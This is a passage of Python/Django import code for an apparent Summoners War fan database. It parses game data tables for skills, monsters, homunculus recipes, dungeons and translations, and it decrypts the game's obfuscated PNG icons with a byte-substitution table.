    homunculus_skill_list = [json.loads(row['master id']) for row in homunculus_skill_table['rows']]
    scaling_stats = ScalingStat.objects.all()
    # NOTE(review): ignore_def_effect is fetched but never used below.
    ignore_def_effect = SkillEffect.objects.get(name='Ignore DEF')
    # Tracking IDs of skills with known issues
    golem_def_skills = [2401, 2402, 2403, 2404, 2405, 2406, 2407, 2410]
    noble_agreement_speed_id = 6519
    holy_light_id = 2909
    for skill_data in skill_table['rows']:
        # Get matching skill in DB
        master_id = json.loads(skill_data['master id'])
        # Skip it if no translation exists
        if master_id not in skill_names or master_id not in skill_descriptions:
            continue
        ###############################################################################################
        # KNOWN ISSUES W/ SOURCE DATA
        # skills with known issues are forcefully modified here. May need updating if skills are updated.
        ###############################################################################################
        if master_id in golem_def_skills:
            # Some golem skills use ATTACK_DEF scaling variable, which is the same as DEF that every other monster has
            skill_data['fun data'] = skill_data['fun data'].replace('ATTACK_DEF', 'DEF')
        if master_id == noble_agreement_speed_id:
            # Skill has different formula compared to other speed skills, so we're gonna set it here
            # It makes no difference to Com2US because they evaluate formulas right to left instead of using order of operations
            skill_data['fun data'] = '[["ATK", "*", 1.0], ["*"], ["ATTACK_SPEED", "+", 240], ["/"], [60]]'
        if master_id == holy_light_id:
            # This is a heal skill, but multiplier in game files is for an attack.
            # Setting multiplier formula based on skill description.
            skill_data['fun data'] = '[["TARGET_CUR_HP", "*", 0.15]]'
        updated = False
        try:
            skill = Skill.objects.get(com2us_id=master_id)
        except Skill.DoesNotExist:
            # Check if it is used on any monster. If so, create it
            # Homunculus skills beyond the starting set are not listed in the monster table
            skill = None
            if master_id in homunculus_skill_list:
                for homu_skill in homunculus_skill_table['rows']:
                    if master_id == json.loads(homu_skill['master id']):
                        slot = json.loads(homu_skill['slot'])
                        skill = _create_new_skill(master_id, slot)
                        break
            else:
                for monster in monster_table['rows']:
                    skill_array = json.loads(monster['base skill'])
                    if master_id in skill_array:
                        # Slot is the 1-based position in the monster's skill list.
                        slot = skill_array.index(master_id) + 1
                        skill = _create_new_skill(master_id, slot)
                        break
            if skill is None:
                print('Skill ID {} is not used anywhere, skipping...'.format(master_id))
                continue
            else:
                updated = True
        # Name
        if skill.name != skill_names[master_id]:
            skill.name = skill_names[master_id]
            print('Updated name to {}'.format(skill.name))
            updated = True
        # Description
        if skill.description != skill_descriptions[master_id]:
            skill.description = skill_descriptions[master_id]
            print('Updated description to {}'.format(skill.description))
            updated = True
        # Icon
        icon_nums = json.loads(skill_data['thumbnail'])
        icon_filename = 'skill_icon_{0:04d}_{1}_{2}.png'.format(*icon_nums)
        if skill.icon_filename != icon_filename:
            skill.icon_filename = icon_filename
            print('Updated icon to {}'.format(skill.icon_filename))
            updated = True
        # Cooltime (game stores turns-minus-one; 0 means no cooldown)
        cooltime = json.loads(skill_data['cool time']) + 1 if json.loads(skill_data['cool time']) > 0 else None
        if skill.cooltime != cooltime:
            skill.cooltime = cooltime
            print('Updated cooltime to {}'.format(skill.cooltime))
            updated = True
        # Max Level
        max_lv = json.loads(skill_data['max level'])
        if skill.max_level != max_lv:
            skill.max_level = max_lv
            print('Updated max level to {}'.format(skill.max_level))
            updated = True
        # Level up progress
        level_up_desc = {
            'DR': 'Effect Rate +{0}%',
            'AT': 'Damage +{0}%',
            'AT1': 'Damage +{0}%',
            'HE': 'Recovery +{0}%',
            'TN': 'Cooltime Turn -{0}',
            'SD': 'Shield +{0}%',
            'SD1': 'Shield +{0}%',
        }
        level_up_text = ''
        for level in json.loads(skill_data['level']):
            level_up_text += level_up_desc[level[0]].format(level[1]) + '\n'
        if skill.level_progress_description != level_up_text:
            skill.level_progress_description = level_up_text
            print('Updated level-up progress description')
            updated = True
        # Buffs
        # maybe this later. Data seems incomplete sometimes.
        # Scaling formula and stats
        skill.scaling_stats.clear()
        # Skill multiplier formula
        if skill.multiplier_formula_raw != skill_data['fun data']:
            skill.multiplier_formula_raw = skill_data['fun data']
            print('Updated raw multiplier formula to {}'.format(skill.multiplier_formula_raw))
            updated = True
        formula, fixed = _force_eval_ltr(json.loads(skill_data['fun data']))
        if formula:
            formula = str(simplify(formula))
            # Find the scaling stat used in this section of formula
            for stat in scaling_stats:
                if stat.com2us_desc in formula:
                    skill.scaling_stats.add(stat)
                    formula = formula.replace(stat.com2us_desc, f'{{{stat.stat}}}')
            if fixed:
                formula += ' (Fixed)'
        if skill.multiplier_formula != formula:
            skill.multiplier_formula = formula
            print('Updated multiplier formula to {}'.format(skill.multiplier_formula))
            updated = True
        # Finally save it if required
        if updated:
            print('Updated skill {}\n'.format(str(skill)))
            if not preview:
                skill.save()
    if preview:
        print('No changes were saved.')
def parse_monster_data(preview=False):
    """Sync Monster rows with the game's MONSTERS localvalue table.

    Creates any missing monsters, then updates family, name, archetype,
    element, obtainability, homunculus/transform status, base stats,
    awakening data, leader skill, skills, and icon filename. Every field
    change is printed. If ``preview`` is True, changes are reported but
    nothing is saved to the database.

    Bug fix vs. previous version: a change to ``can_awaken`` now sets the
    ``updated`` flag, so it is saved even when no other field changed.
    """
    monster_table = _get_localvalue_tables(LocalvalueTables.MONSTERS)
    monster_names = get_monster_names_by_id()

    # List of monsters that data indicates are not obtainable, but actually are
    # Dark cow girl
    # Vampire Lord
    definitely_obtainable_monsters = [19305, 19315, 23005, 23015]

    # com2us essence item ID -> (element, grade) for the matching
    # awaken_mats_<element>_<grade> model field. Insertion order matches the
    # original per-element low/mid/high order so printed output is unchanged.
    essence_fields = {
        11001: ('water', 'low'),
        12001: ('water', 'mid'),
        13001: ('water', 'high'),
        11002: ('fire', 'low'),
        12002: ('fire', 'mid'),
        13002: ('fire', 'high'),
        11003: ('wind', 'low'),
        12003: ('wind', 'mid'),
        13003: ('wind', 'high'),
        11004: ('light', 'low'),
        12004: ('light', 'mid'),
        13004: ('light', 'high'),
        11005: ('dark', 'low'),
        12005: ('dark', 'mid'),
        13005: ('dark', 'high'),
        11006: ('magic', 'low'),
        12006: ('magic', 'mid'),
        13006: ('magic', 'high'),
    }

    # Base stats: (model field, localvalue column, display label)
    stat_columns = [
        ('base_stars', 'base class', 'base stars'),
        ('raw_hp', 'base con', 'raw HP'),
        ('raw_attack', 'base atk', 'raw attack'),
        ('raw_defense', 'base def', 'raw defense'),
        ('resistance', 'resistance', 'resistance'),
        ('accuracy', 'accuracy', 'accuracy'),
        ('speed', 'base speed', 'speed'),
        ('crit_rate', 'critical rate', 'critical rate'),
        ('crit_damage', 'critical damage', 'critical damage'),
    ]

    for row in monster_table['rows']:
        master_id = json.loads(row['unit master id'])

        # Skip it if no name translation exists
        if master_id not in monster_names:
            continue

        try:
            monster = Monster.objects.get(com2us_id=master_id)
            updated = False
        except Monster.DoesNotExist:
            monster = Monster.objects.create(com2us_id=master_id, obtainable=False, name='tempname', base_stars=1)
            print('!!! Creating new monster {} with com2us ID {}'.format(monster_names[master_id], master_id))
            updated = True

        # Family
        monster_family = json.loads(row['group id'])
        if monster.family_id != monster_family:
            monster.family_id = monster_family
            print('Updated {} ({}) family ID to {}'.format(monster, master_id, monster_family))
            updated = True

        # Name
        if monster.name != monster_names[master_id]:
            print("Updated {} ({}) name to {}".format(monster, master_id, monster_names[master_id]))
            monster.name = monster_names[master_id]
            updated = True

        # Archetype
        archetype = archetype_map.get(json.loads(row['style type']))
        if monster.archetype != archetype:
            monster.archetype = archetype
            print('Updated {} ({}) archetype to {}'.format(monster, master_id, monster.get_archetype_display()))
            updated = True

        # Element
        element = element_map[json.loads(row['attribute'])]
        if monster.element != element:
            monster.element = element
            print('Updated {} ({}) element to {}'.format(monster, master_id, element))
            updated = True

        # Obtainable
        obtainable = sum(json.loads(row['collection view'])) > 0 or master_id in definitely_obtainable_monsters
        if monster.obtainable != obtainable:
            monster.obtainable = obtainable
            print('Updated {} ({}) obtainability to {}'.format(monster, master_id, obtainable))
            updated = True

        # Homunculus
        is_homunculus = bool(json.loads(row['homunculus']))
        if monster.homunculus != is_homunculus:
            monster.homunculus = is_homunculus
            print('Updated {} ({}) homunculus status to {}'.format(monster, master_id, is_homunculus))
            updated = True

        # Transformation (e.g. Unicorn)
        transforms_into_id = json.loads(row['change'])
        if transforms_into_id != 0:
            try:
                transforms_into = Monster.objects.get(com2us_id=transforms_into_id)
            except Monster.DoesNotExist:
                print('!!! {} ({}) can transform into {} but could not find transform monster in database'.format(monster, master_id, transforms_into_id))
            else:
                if monster.transforms_into != transforms_into:
                    monster.transforms_into = transforms_into
                    print('Updated {} ({}) can transform into {} ({})'.format(monster, master_id, transforms_into, transforms_into_id))
                    updated = True
        else:
            if monster.transforms_into is not None:
                monster.transforms_into = None
                print('Removed monster transformation from {} ({})'.format(monster, master_id))
                updated = True

        # Stats
        for field, column, label in stat_columns:
            value = json.loads(row[column])
            if getattr(monster, field) != value:
                setattr(monster, field, value)
                print('Updated {} ({}) {} to {}'.format(monster, master_id, label, value))
                updated = True

        # Awakening. Awakened monsters have '1' as the second-to-last digit
        # of their master ID.
        awakened = row['unit master id'][-2] == '1'
        awakens_to_com2us_id = json.loads(row['awaken unit id'])
        if awakened != monster.is_awakened:
            monster.is_awakened = awakened
            print('Updated {} ({}) awakened status to {}'.format(monster, master_id, monster.is_awakened))
            updated = True

        can_awaken = awakened or awakens_to_com2us_id > 0
        if monster.can_awaken != can_awaken:
            monster.can_awaken = can_awaken
            print('Updated {} ({}) can awaken status to {}'.format(monster, master_id, monster.can_awaken))
            # Bug fix: previously this change did not set the updated flag,
            # so it was only persisted when another field also changed.
            updated = True

        if monster.can_awaken and not monster.is_awakened:
            # Auto-assign awakens_to if possible (which will auto-update awakens_from on other monster)
            try:
                awakens_to_monster = Monster.objects.get(com2us_id=awakens_to_com2us_id)
            except Monster.DoesNotExist:
                print('!!! {} ({}) can awaken but could not find awakened monster in database'.format(monster, master_id))
            else:
                if monster.awakens_to != awakens_to_monster:
                    monster.awakens_to = awakens_to_monster
                    print('Updated {} ({}) awakened version to {}'.format(monster, master_id, awakens_to_monster))
                    updated = True

        # Awakening materials: each entry is [essence_id, quantity, ...]
        awaken_materials = json.loads(row['awaken materials'])
        essences_used = [mat[0] for mat in awaken_materials]

        # Zero out essence fields that the recipe no longer uses
        for essence_id, (element_name, grade) in essence_fields.items():
            field = 'awaken_mats_{}_{}'.format(element_name, grade)
            if essence_id not in essences_used and getattr(monster, field) != 0:
                setattr(monster, field, 0)
                print("Updated {} ({}) {} {} awakening essence to 0.".format(monster, master_id, element_name, grade))
                updated = True

        # Fill in values for the essences specified
        for material in awaken_materials:
            mapping = essence_fields.get(material[0])
            if mapping is None:
                # Unknown essence ID - silently ignored, as before
                continue
            element_name, grade = mapping
            qty = material[1]
            field = 'awaken_mats_{}_{}'.format(element_name, grade)
            if getattr(monster, field) != qty:
                setattr(monster, field, qty)
                print("Updated {} ({}) {} {} awakening essence to {}".format(monster, master_id, element_name, grade, qty))
                updated = True

        # Leader skill
        # Data is a 5 element array
        # [0] - arbitrary unique ID
        # [1] - Area of effect: see com2us_mapping.leader_skill_area_map
        # [2] - Element: see com2us_mapping.element_map
        # [3] - Stat: see com2us_mapping.leader_skill_stat_map
        # [4] - Value of skill bonus
        leader_skill_data = json.loads(row['leader skill'])
        if leader_skill_data:
            stat = leader_skill_stat_map[leader_skill_data[3]]
            value = int(leader_skill_data[4] * 100)
            if leader_skill_data[2]:
                area = LeaderSkill.AREA_ELEMENT
                element = element_map[leader_skill_data[2]]
            else:
                area = leader_skill_area_map[leader_skill_data[1]]
                element = None
            try:
                matching_skill = LeaderSkill.objects.get(attribute=stat, amount=value, area=area, element=element)
            except LeaderSkill.DoesNotExist:
                # Create the new leader skill
                matching_skill = LeaderSkill.objects.create(attribute=stat, amount=value, area=area, element=element)
            if monster.leader_skill != matching_skill:
                monster.leader_skill = matching_skill
                print('Updated {} ({}) leader skill to {}'.format(monster, master_id, matching_skill))
                updated = True
        else:
            if monster.leader_skill is not None:
                monster.leader_skill = None
                print('Removed ({}) leader skill from {}'.format(monster, master_id))
                updated = True

        # Skills
        existing_skills = monster.skills.all()
        skill_set = Skill.objects.filter(com2us_id__in=json.loads(row['base skill']))
        if set(existing_skills) != set(skill_set):
            if not preview:
                monster.skills.set(skill_set)
            print("Updated {} ({}) skill set".format(monster, master_id))
            # updated=True skipped because m2m relationship set directly

        skill_max_levels = skill_set.values_list('max_level', flat=True)
        skill_ups_to_max = sum(skill_max_levels) - len(skill_max_levels)
        if monster.skill_ups_to_max != skill_ups_to_max:
            monster.skill_ups_to_max = skill_ups_to_max
            print(f'Updated {monster} ({master_id}) skill ups to max to {skill_ups_to_max}.')
            updated = True

        # Icon
        icon_nums = json.loads(row['thumbnail'])
        icon_filename = 'unit_icon_{0:04d}_{1}_{2}.png'.format(*icon_nums)
        if monster.image_filename != icon_filename:
            monster.image_filename = icon_filename
            print("Updated {} ({}) icon filename".format(monster, master_id))
            updated = True

        # Finally, save if anything changed
        if updated and not preview:
            monster.save()
            print('Saved changes to {} ({})\n'.format(monster, master_id))
    if preview:
        print('No changes were saved.')
def parse_homunculus_data():
    """Sync homunculus craft costs and skill upgrade recipes from localvalue data.

    Unlike the other parsers this always saves immediately - there is no
    preview mode. Material-cost child rows are deleted and recreated
    wholesale on every run.
    """
    # Homunculus craft costs
    craft_cost_table = _get_localvalue_tables(LocalvalueTables.HOMUNCULUS_CRAFT_COSTS)
    for row in craft_cost_table['rows']:
        # 'craft cost' is a list; index 2 is presumably the mana amount
        # (matches 'upgrade cost' indexing below) - TODO confirm
        mana_cost = json.loads(row['craft cost'])[2]
        for monster_id in json.loads(row['unit master id']):
            monster = Monster.objects.get(com2us_id=monster_id)
            monster.craft_cost = mana_cost
            print('Set craft cost of {} ({}) to {}'.format(monster, monster.com2us_id, mana_cost))
            monster.save()
            # Material costs - clear and re-init
            monster.monstercraftcost_set.all().delete()
            for material_cost in json.loads(row['craft stuff']):
                # material_cost: [?, material com2us ID, quantity]
                qty = material_cost[2]
                material = CraftMaterial.objects.get(com2us_id=material_cost[1])
                craft_cost = MonsterCraftCost.objects.create(monster=monster, craft=material, quantity=qty)
                print('Set craft material {} on {} ({})'.format(craft_cost, monster, monster.com2us_id))
    # Homunculus skill costs/requirements
    skill_table = _get_localvalue_tables(LocalvalueTables.HOMUNCULUS_SKILL_TREES)
    for row in skill_table['rows']:
        skill_id = json.loads(row['master id'])
        print('\nUpdating skill upgrade recipe for {}'.format(skill_id))
        try:
            skill = HomunculusSkill.objects.get(skill__com2us_id=skill_id)
        except HomunculusSkill.DoesNotExist:
            # First time seeing this skill - create its recipe container
            skill = HomunculusSkill.objects.create(skill=Skill.objects.get(com2us_id=skill_id))
        skill.mana_cost = json.loads(row['upgrade cost'])[2]
        print('Set upgrade cost of {} upgrade recipe to {}'.format(skill, skill.mana_cost))
        skill.save()
        # Monsters this skill can be crafted onto
        monsters_used_on_ids = json.loads(row['unit master id'])
        monsters_used_on = Monster.objects.filter(com2us_id__in=monsters_used_on_ids)
        skill.monsters.set(monsters_used_on, clear=True)
        print('Set monster list of {} upgrade recipe to {}'.format(skill, list(skill.monsters.values_list('name', 'com2us_id'))))
        # Skills that must be learned before this one
        prerequisite_skill_ids = json.loads(row['prerequisite'])
        prerequisite_skills = Skill.objects.filter(com2us_id__in=prerequisite_skill_ids)
        skill.prerequisites.set(prerequisite_skills, clear=True)
        print('Set prerequisite skills of {} upgrade recipe to {}'.format(skill, list(skill.prerequisites.values_list('name', 'com2us_id'))))
        # Material costs - clear and re-init
        skill.homunculusskillcraftcost_set.all().delete()
        for material_cost in json.loads(row['upgrade stuff']):
            qty = material_cost[2]
            material = CraftMaterial.objects.get(com2us_id=material_cost[1])
            upgrade_cost = HomunculusSkillCraftCost.objects.create(skill=skill, craft=material, quantity=qty)
            print('Set upgrade material {} on {} upgrade recipe'.format(upgrade_cost, skill))
def crop_monster_images():
    """Remove the 1px white border from freshly-extracted monster icons.

    Some icons come out of the game data as 102x102 with a 1px border;
    crop those back down to 100x100 in place. Images already at the
    correct size are left untouched.
    """
    for im_path in iglob('herders/static/herders/images/monsters/*.png'):
        # Use the context manager so the file handle is released even for
        # images that do not need cropping (previously those leaked).
        with Image.open(im_path) as im:
            cropped = im.crop((1, 1, 101, 101)) if im.size == (102, 102) else None
        if cropped is not None:
            cropped.save(im_path)
def decrypt_com2us_png():
    """Decrypt Com2uS-obfuscated PNG images in place.

    Obfuscated PNGs are marked by the 8th signature byte being 0x0B
    instead of the standard 0x0A. For such files the signature is fixed
    and the remaining bytes are rewritten through a fixed substitution
    table, then the file is written back.
    """
    # Byte substitution table: decrypted_value = table[encrypted_value]
    com2us_decrypt_values = [
        0x2f, 0x7c, 0x47, 0x55, 0x32, 0x77, 0x9f, 0xfb, 0x5b, 0x86, 0xfe, 0xb6, 0x3e, 0x06, 0xf4, 0xc4,
        0x2e, 0x08, 0x49, 0x11, 0x0e, 0xce, 0x84, 0xd3, 0x7b, 0x18, 0xa6, 0x5c, 0x71, 0x56, 0xe2, 0x3b,
        0xfd, 0xb3, 0x2b, 0x97, 0x9d, 0xfc, 0xca, 0xba, 0x8e, 0x7e, 0x6f, 0x0f, 0xe8, 0xbb, 0xc7, 0xc2,
        0xd9, 0xa4, 0xd2, 0xe0, 0xa5, 0x95, 0xee, 0xab, 0xf3, 0xe4, 0xcb, 0x63, 0x25, 0x70, 0x4e, 0x8d,
        0x21, 0x37, 0x9a, 0xb0, 0xbc, 0xc6, 0x48, 0x3f, 0x23, 0x80, 0x20, 0x01, 0xd7, 0xf9, 0x5e, 0xec,
        0x16, 0xd6, 0xd4, 0x1f, 0x51, 0x42, 0x6c, 0x10, 0x14, 0xb7, 0xcc, 0x82, 0x7f, 0x13, 0x02, 0x00,
        0x72, 0xed, 0x90, 0x57, 0xc1, 0x2c, 0x5d, 0x28, 0x81, 0x1d, 0x38, 0x1a, 0xac, 0xad, 0x35, 0x78,
        0xdc, 0x68, 0xb9, 0x8b, 0x6a, 0xe1, 0xc3, 0xe3, 0xdb, 0x6d, 0x04, 0x27, 0x9c, 0x64, 0x5a, 0x8f,
        0x83, 0x0c, 0xd8, 0xa8, 0x1c, 0x89, 0xd5, 0x43, 0x74, 0x73, 0x4d, 0xae, 0xea, 0x31, 0x6e, 0x1e,
        0x91, 0x1b, 0x59, 0xc9, 0xbd, 0xf7, 0x07, 0xe7, 0x8a, 0x05, 0x8c, 0x4c, 0xbe, 0xc5, 0xdf, 0xe5,
        0xf5, 0x2d, 0x4b, 0x76, 0x66, 0xf2, 0x50, 0xd0, 0xb4, 0x85, 0xef, 0xb5, 0x3c, 0x7d, 0x3d, 0xe6,
        0x9b, 0x03, 0x0d, 0x61, 0x33, 0xf1, 0x92, 0x53, 0xff, 0x96, 0x09, 0x67, 0x69, 0x44, 0xa3, 0x4a,
        0xaf, 0x41, 0xda, 0x54, 0x46, 0xd1, 0xfa, 0xcd, 0x24, 0xaa, 0x88, 0xa7, 0x19, 0xde, 0x40, 0xeb,
        0x94, 0x5f, 0x45, 0x65, 0xf0, 0xb8, 0x34, 0xdd, 0x0b, 0xb1, 0x29, 0xe9, 0x2a, 0x75, 0x87, 0x39,
        0xcf, 0x79, 0x93, 0xa1, 0xb2, 0x30, 0x15, 0x7a, 0x52, 0x12, 0x62, 0x36, 0xbf, 0x22, 0x4f, 0xc0,
        0xa2, 0x17, 0xc8, 0x99, 0x3a, 0x60, 0xa9, 0xa0, 0x58, 0xf6, 0x0a, 0x9e, 0xf8, 0x6b, 0x26, 0x98
    ]
    for im_path in iglob('herders/static/herders/images/**/*.png', recursive=True):
        encrypted = BitStream(filename=im_path)
        # Check if it is encrypted. 8th byte is 0x0B instead of the correct signature 0x0A
        encrypted.pos = 0x07 * 8
        signature = encrypted.peek('uint:8')
        if signature == 0x0B:
            print('Decrypting {}'.format(im_path))
            # Correct the PNG signature
            encrypted.overwrite('0x0A', encrypted.pos)
            # Replace bits with magic decrypted values
            # (overwrite advanced the position, so substitution starts at the
            # byte after the signature and runs until end of stream)
            try:
                while True:
                    pos = encrypted.pos
                    val = encrypted.peek('uint:8')
                    encrypted.overwrite(Bits(uint=com2us_decrypt_values[val], length=8), pos)
            except ReadError:
                # EOF
                pass
            # Write it back to the file
            with open(im_path, 'wb') as f:
                encrypted.tofile(f)
class TranslationTables(IntEnum):
    """Table indices within text_eng.dat (parsed by _get_translation_tables)."""
    ISLAND_NAMES = 1
    MONSTER_NAMES = 2
    SUMMON_METHODS = 10
    SKILL_NAMES = 20
    SKILL_DESCRIPTIONS = 21
    WORLD_MAP_DUNGEON_NAMES = 29
    CAIROS_DUNGEON_NAMES = 30
def get_monster_names_by_id():
    """Return the monster-name translation table, keyed by com2us string ID."""
    tables = _get_translation_tables()
    return tables[TranslationTables.MONSTER_NAMES]
def get_skill_names_by_id():
    """Return the skill-name translation table, keyed by com2us string ID."""
    tables = _get_translation_tables()
    return tables[TranslationTables.SKILL_NAMES]
def get_skill_descs_by_id():
    """Return the skill-description translation table, keyed by com2us string ID."""
    tables = _get_translation_tables()
    return tables[TranslationTables.SKILL_DESCRIPTIONS]
# Dungeons and Scenarios
def parse_scenarios():
    """Sync scenario Dungeon and Level rows from the SCENARIO_LEVELS table.

    NOTE(review): update_or_create() is called with every field in the
    lookup kwargs and no defaults=, so a change to any field (e.g. energy
    cost) inserts a new row instead of updating the existing one -
    confirm this is intentional.
    """
    scenario_table = _get_localvalue_tables(LocalvalueTables.SCENARIO_LEVELS)
    scenario_names = _get_scenario_names_by_id()
    for row in scenario_table['rows']:
        dungeon_id = int(row['region id'])
        name = scenario_names[dungeon_id]
        # Placeholder for scenarios with a blank translated name
        if name.strip() == '':
            name = 'UNKNOWN'
        # Update (or create) the dungeon this scenario level will be assigned to
        dungeon, created = Dungeon.objects.update_or_create(
            com2us_id=dungeon_id,
            name=name,
            category=Dungeon.CATEGORY_SCENARIO,
        )
        if created:
            print(f'Added new dungeon {dungeon.name} - {dungeon.slug}')
        # Update (or create) the scenario level
        difficulty = int(row['difficulty'])
        stage = int(row['stage no'])
        energy_cost = int(row['energy cost'])
        slots = int(row['player unit slot'])
        level, created = Level.objects.update_or_create(
            dungeon=dungeon,
            difficulty=difficulty,
            floor=stage,
            energy_cost=energy_cost,
            frontline_slots=slots,
            backline_slots=None,
            total_slots=slots,
        )
        if created:
            print(f'Added new level for {dungeon.name} - {level.get_difficulty_display()} B{stage}')
def _get_scenario_names_by_id():
    """Map scenario 'region id' values to their world-map dungeon names.

    The SCENARIO_LEVELS table's 'region id' is a 1-based index into the
    scenario-type entries (type == 3) of the WORLD_MAP localvalue table.
    """
    dungeon_names = _get_translation_tables()[TranslationTables.WORLD_MAP_DUNGEON_NAMES]
    world_map_rows = _get_localvalue_tables(LocalvalueTables.WORLD_MAP)['rows']

    scenario_entries = (entry for entry in world_map_rows if int(entry['type']) == 3)
    names_by_region = {}
    for index, entry in enumerate(scenario_entries):
        names_by_region[index + 1] = dungeon_names[int(entry['world id'])]
    return names_by_region
def parse_cairos_dungeons():
    """Sync Cairos Dungeon and Level rows from the bundled dungeon_list.json.

    NOTE(review): update_or_create() uses every field as lookup kwargs
    with no defaults=, so changed values (e.g. energy cost) create new
    rows instead of updating existing ones - confirm this is intentional.
    """
    dungeon_names = _get_translation_tables()[TranslationTables.CAIROS_DUNGEON_NAMES]
    with open('bestiary/com2us_data/dungeon_list.json', 'r') as f:
        for dungeon_data in json.load(f):
            group_id = dungeon_data['group_id']
            dungeon_id = dungeon_data['dungeon_id']
            # Names are keyed by the dungeon group, not the individual dungeon
            name = dungeon_names[group_id]
            dungeon, created = Dungeon.objects.update_or_create(
                com2us_id=dungeon_id,
                name=name,
                category=Dungeon.CATEGORY_CAIROS,
            )
            if created:
                print(f'Added new dungeon {dungeon.name} - {dungeon.slug}')
            # Create levels
            for level_data in dungeon_data['stage_list']:
                stage = int(level_data['stage_id'])
                energy_cost = int(level_data['cost'])
                slots = 5  # Cairos parties always field 5 frontline monsters
                level, created = Level.objects.update_or_create(
                    dungeon=dungeon,
                    floor=stage,
                    energy_cost=energy_cost,
                    frontline_slots=slots,
                    backline_slots=None,
                    total_slots=slots,
                )
                if created:
                    print(f'Added new level for {dungeon.name} - {level.get_difficulty_display() if level.difficulty is not None else ""} B{stage}')
def parse_secret_dungeons():
    """Sync SecretDungeon rows (one per summonable monster) plus a single level each.

    NOTE(review): update_or_create() uses every field as lookup kwargs
    with no defaults= - changed values create new rows instead of
    updating existing ones - confirm this is intentional.
    """
    dungeon_table = _get_localvalue_tables(LocalvalueTables.SECRET_DUNGEONS)
    for row in dungeon_table['rows']:
        dungeon_id = int(row['instance id'])
        # The 'summon pieces' column holds the com2us ID of the monster
        # whose pieces drop in this dungeon
        monster_id = int(row['summon pieces'])
        monster = Monster.objects.get(com2us_id=monster_id)
        dungeon, created = SecretDungeon.objects.update_or_create(
            com2us_id=dungeon_id,
            name=f'{monster.get_element_display()} {monster.name} Secret Dungeon',
            category=SecretDungeon.CATEGORY_SECRET,
            monster=monster,
        )
        if created:
            print(f'Added new secret dungeon {dungeon.name} - {dungeon.slug}')
        # Create a single level referencing this dungeon
        level, created = Level.objects.update_or_create(
            dungeon=dungeon,
            floor=1,
            energy_cost=3,
            frontline_slots=5,
            backline_slots=None,
            total_slots=5,
        )
        if created:
            print(f'Added new level for {dungeon.name} - {level.get_difficulty_display() if level.difficulty is not None else ""} B{1}')
def parse_elemental_rift_dungeons():
    """Sync Rift of Worlds beast dungeons, named after the beast monster.

    NOTE(review): update_or_create() uses every field as lookup kwargs
    with no defaults= - changed values create new rows instead of
    updating existing ones - confirm this is intentional.
    """
    dungeon_table = _get_localvalue_tables(LocalvalueTables.ELEMENTAL_RIFT_DUNGEONS)
    monster_names = _get_translation_tables()[TranslationTables.MONSTER_NAMES]
    for row in dungeon_table['rows']:
        # Skip dungeons not currently enabled in the game data
        if int(row['enable']):
            dungeon_id = int(row['master id'])
            name = monster_names[int(row['unit id'])].strip()
            dungeon, created = Dungeon.objects.update_or_create(
                com2us_id=dungeon_id,
                name=name,
                category=Dungeon.CATEGORY_RIFT_OF_WORLDS_BEASTS,
            )
            if created:
                print(f'Added new dungeon {dungeon.name} - {dungeon.slug}')
            # Create a single level referencing this dungeon
            level, created = Level.objects.update_or_create(
                dungeon=dungeon,
                floor=1,
                energy_cost=int(row['cost energy']),
                frontline_slots=4,
                backline_slots=4,
                total_slots=6,
            )
            if created:
                print(f'Added new level for {dungeon.name} - {level.get_difficulty_display() if level.difficulty is not None else ""} B{1}')
def parse_rift_raid():
    """Sync Rift Raid dungeon and one Level per raid stage.

    NOTE(review): update_or_create() uses every field as lookup kwargs
    with no defaults= - changed values create new rows instead of
    updating existing ones - confirm this is intentional.
    """
    raid_table = _get_localvalue_tables(LocalvalueTables.RIFT_RAIDS)
    for row in raid_table['rows']:
        raid_id = int(row['raid id'])
        dungeon, created = Dungeon.objects.update_or_create(
            com2us_id=raid_id,
            name='Rift Raid',
            category=Dungeon.CATEGORY_RIFT_OF_WORLDS_RAID,
        )
        if created:
            print(f'Added new dungeon {dungeon.name} - {dungeon.slug}')
        level, created = Level.objects.update_or_create(
            dungeon=dungeon,
            floor=int(row['stage id']),
            energy_cost=int(row['cost energy']),
            frontline_slots=4,
            backline_slots=4,
            total_slots=6,
        )
        if created:
            print(f'Added new level for {dungeon.name} - {level.get_difficulty_display() if level.difficulty is not None else ""} B{1}')
def save_translation_tables():
    """Dump all translation tables into a single CSV for inspection.

    Output columns: table_num, id, text. The file is written next to the
    source .dat file.
    """
    tables = _get_translation_tables()
    # newline='' is required by the csv module; without it every row is
    # followed by a blank line on Windows (\r\r\n line endings)
    with open('bestiary/com2us_data/text_eng.csv', 'w', encoding='utf-8', newline='') as f:
        writer = csv.writer(f)
        writer.writerow(['table_num', 'id', 'text'])
        for table_idx, table in enumerate(tables):
            for key, text in table.items():
                writer.writerow([table_idx, key, text.strip()])
def _get_translation_tables():
    """Parse text_eng.dat into a list of {string_id: text} dicts.

    File layout (little-endian int32s): a version header, then repeated
    tables of [entry_count, entry_count * (string_id, byte_length,
    string bytes)]. Tables are read until end of file.
    """
    raw = ConstBitStream(filename='bestiary/com2us_data/text_eng.dat')
    tables = []
    table_ver = raw.read('intle:32')
    print(f'Translation table version {table_ver}')
    try:
        while True:
            table_len = raw.read('intle:32')
            table = {}
            for _ in range(table_len):
                str_id, str_len = raw.readlist('intle:32, intle:32')
                # [:-4] drops the last 4 hex chars (2 bytes) of the string -
                # presumably a null terminator on each entry - TODO confirm
                parsed_str = binascii.a2b_hex(raw.read('hex:{}'.format(str_len * 8))[:-4])
                table[str_id] = parsed_str.decode("utf-8")
            tables.append(table)
    except ReadError:
        # EOF
        pass
    return tables
class LocalvalueTables(IntEnum):
    """Table numbers within localvalue.dat (extracted by _get_localvalue_tables).

    Names for unknown tables are best-guess annotations from inspecting the
    data; commented-out numbers are tables whose purpose is not yet known.
    """
    WIZARD_XP_REQUIREMENTS = 1
    SKY_ISLANDS = 2
    BUILDINGS = 3
    DECORATIONS = 4
    OBSTACLES = 5
    MONSTERS = 6
    MONSTER_LEVELING = 7
    # Unknown table 8 - some sort of effect mapping
    SKILL_EFFECTS = 9
    SKILLS = 10
    SUMMON_METHODS = 11
    RUNE_SET_DEFINITIONS = 12
    NPC_ARENA_RIVALS = 13
    ACHIEVEMENTS = 14
    TUTORIALS = 15
    SCENARIO_BOSSES = 16
    SCENARIO_LEVELS = 17
    CAIROS_BOSS_INTROS = 18
    # Unknown table 19 - more effect mapping
    WORLD_MAP = 20
    ARENA_RANKS = 21
    MONTHLY_REWARDS = 22
    CAIROS_DUNGEON_LIST = 23
    INVITE_FRIEND_REWARDS_OLD = 24
    # Unknown table 25 - probably x/y positions of 3d models in dungeons/scenarios
    AWAKENING_ESSENCES = 26
